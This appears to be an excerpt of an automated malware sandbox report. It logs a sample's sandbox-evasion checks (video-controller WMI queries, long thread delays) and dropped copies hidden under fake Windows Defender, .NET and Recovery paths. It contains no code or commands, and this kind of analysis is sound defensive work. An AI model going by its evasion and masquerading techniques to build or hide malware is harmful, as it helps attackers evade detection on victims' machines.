Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\schtasks.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Microsoft.NET\System.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Memory allocated: 1180000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Memory allocated: 1AE60000 memory reserve | memory write watch Jump to behavior
Source: C:\Recovery\xMLVfJVxhYAkoCJ.exe Memory allocated: 1720000 memory reserve | memory write watch Jump to behavior
Source: C:\Recovery\xMLVfJVxhYAkoCJ.exe Memory allocated: 1B2E0000 memory reserve | memory write watch Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Memory allocated: C90000 memory reserve | memory write watch Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Memory allocated: 1A980000 memory reserve | memory write watch Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Memory allocated: 2A60000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Memory allocated: 1AE20000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Memory allocated: 2DA0000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Memory allocated: 1AF40000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Memory allocated: B90000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Memory allocated: 1A8A0000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Memory allocated: E00000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Memory allocated: 1A980000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Memory allocated: 1270000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Memory allocated: 1ADF0000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Memory allocated: 1260000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Memory allocated: 1AEC0000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Memory allocated: 9B0000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Memory allocated: 1A5E0000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Memory allocated: 1720000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Memory allocated: 1AF60000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Memory allocated: 11B0000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Memory allocated: 1AAF0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Recovery\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Thread delayed: delay time: 600000
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Thread delayed: delay time: 599890
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Thread delayed: delay time: 599781
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Thread delayed: delay time: 599672
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Thread delayed: delay time: 599562
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Thread delayed: delay time: 599453
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Thread delayed: delay time: 599343
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Thread delayed: delay time: 599234
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Thread delayed: delay time: 599125
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Thread delayed: delay time: 599015
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Thread delayed: delay time: 598906
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Thread delayed: delay time: 598797
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Thread delayed: delay time: 598687
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Thread delayed: delay time: 598578
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Thread delayed: delay time: 598468
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Thread delayed: delay time: 598356
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Thread delayed: delay time: 598248
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Thread delayed: delay time: 600000
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Thread delayed: delay time: 599875
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Thread delayed: delay time: 599765
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Thread delayed: delay time: 599656
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Thread delayed: delay time: 599547
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Thread delayed: delay time: 599437
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Thread delayed: delay time: 599328
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Thread delayed: delay time: 599218
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Thread delayed: delay time: 599109
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Thread delayed: delay time: 599000
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Thread delayed: delay time: 598890
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Thread delayed: delay time: 598781
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Thread delayed: delay time: 598671
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Thread delayed: delay time: 598562
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Thread delayed: delay time: 598453
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Thread delayed: delay time: 598343
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Thread delayed: delay time: 598234
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Thread delayed: delay time: 600000
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Thread delayed: delay time: 599890
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Thread delayed: delay time: 599781
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Thread delayed: delay time: 599672
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Thread delayed: delay time: 599563
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Thread delayed: delay time: 599453
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Thread delayed: delay time: 599344
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Thread delayed: delay time: 599234
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Thread delayed: delay time: 599125
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Thread delayed: delay time: 599013
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Thread delayed: delay time: 598906
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Thread delayed: delay time: 598797
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Thread delayed: delay time: 598686
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Thread delayed: delay time: 598578
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Thread delayed: delay time: 598267
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Thread delayed: delay time: 598141
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 600000
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 599875
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 599765
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 599654
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 599531
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 599421
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 599312
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 599203
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 599094
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 598969
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 598859
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 598750
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 598640
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 598531
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 598422
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 598312
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 598203
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Window / User API: threadDelayed 974 Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe Window / User API: threadDelayed 1030 Jump to behavior
Source: C:\Recovery\xMLVfJVxhYAkoCJ.exe Window / User API: threadDelayed 411 Jump to behavior
Source: C:\Recovery\xMLVfJVxhYAkoCJ.exe Window / User API: threadDelayed 609 Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Window / User API: threadDelayed 366 Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Window / User API: threadDelayed 364 Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Window / User API: threadDelayed 367
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Window / User API: threadDelayed 366
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Window / User API: threadDelayed 367
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Window / User API: threadDelayed 366
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Window / User API: threadDelayed 870
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Window / User API: threadDelayed 462
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Window / User API: threadDelayed 495
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Window / User API: threadDelayed 1582
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe Window / User API: threadDelayed 3385
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Window / User API: threadDelayed 1304
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe Window / User API: threadDelayed 3824
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Window / User API: threadDelayed 1469
Source: C:\Program Files (x86)\Microsoft.NET\System.exe Window / User API: threadDelayed 2490
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Window / User API: threadDelayed 1930
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe Window / User API: threadDelayed 2373
Source: C:\Users\user\Desktop\XPC5PMKegV.exe TID: 3300 Thread sleep count: 974 > 30 Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe TID: 3300 Thread sleep count: 1030 > 30 Jump to behavior
Source: C:\Users\user\Desktop\XPC5PMKegV.exe TID: 5912 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Recovery\xMLVfJVxhYAkoCJ.exe TID: 5896 Thread sleep count: 411 > 30 Jump to behavior
Source: C:\Recovery\xMLVfJVxhYAkoCJ.exe TID: 5676 Thread sleep count: 609 > 30 Jump to behavior
Source: C:\Recovery\xMLVfJVxhYAkoCJ.exe TID: 3220 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 4508 Thread sleep count: 366 > 30 Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 7140 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 6792 Thread sleep count: 364 > 30 Jump to behavior
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5176 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 2036 Thread sleep count: 222 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 3052 Thread sleep count: 165 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 7012 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 4052 Thread sleep count: 367 > 30
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 3004 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 5960 Thread sleep count: 366 > 30
Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 5764 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 1460 Thread sleep count: 367 > 30
Source: C:\Program Files (x86)\Microsoft.NET\System.exe TID: 5388 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 7068 Thread sleep count: 366 > 30
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 2968 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 6316 Thread sleep count: 870 > 30
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 4780 Thread sleep count: 115 > 30
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 672 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 5272 Thread sleep count: 462 > 30
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 6568 Thread sleep count: 495 > 30
Source: C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\xMLVfJVxhYAkoCJ.exe TID: 1424 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660 Thread sleep time: -600000s >= -30000s
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660 Thread sleep time: -599890s >= -30000s
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660 Thread sleep time: -599781s >= -30000s
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660 Thread sleep time: -599672s >= -30000s
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660 Thread sleep time: -599562s >= -30000s
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660 Thread sleep time: -599453s >= -30000s
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660 Thread sleep time: -599343s >= -30000s
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660 Thread sleep time: -599234s >= -30000s
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660 Thread sleep time: -599125s >= -30000s
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660 Thread sleep time: -599015s >= -30000s
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660 Thread sleep time: -598906s >= -30000s
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660 Thread sleep time: -598797s >= -30000s
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660 Thread sleep time: -598687s >= -30000s
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660 Thread sleep time: -598578s >= -30000s
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660 Thread sleep time: -598468s >= -30000s
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660 Thread sleep time: -598356s >= -30000s
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 5660 Thread sleep time: -598248s >= -30000s
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 6492 Thread sleep time: -30000s >= -30000s
Source: C:\Program Files\Microsoft Office 15\ClientX64\Registry.exe TID: 4188 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5924 Thread sleep count: 1304 > 30
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 1908 Thread sleep count: 3824 > 30
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316 Thread sleep time: -600000s >= -30000s
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316 Thread sleep time: -599875s >= -30000s
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316 Thread sleep time: -599765s >= -30000s
Source: C:\Program Files (x86)\Windows Defender\StartMenuExperienceHost.exe TID: 5316 Thread sleep time: -599656s >= -30000s
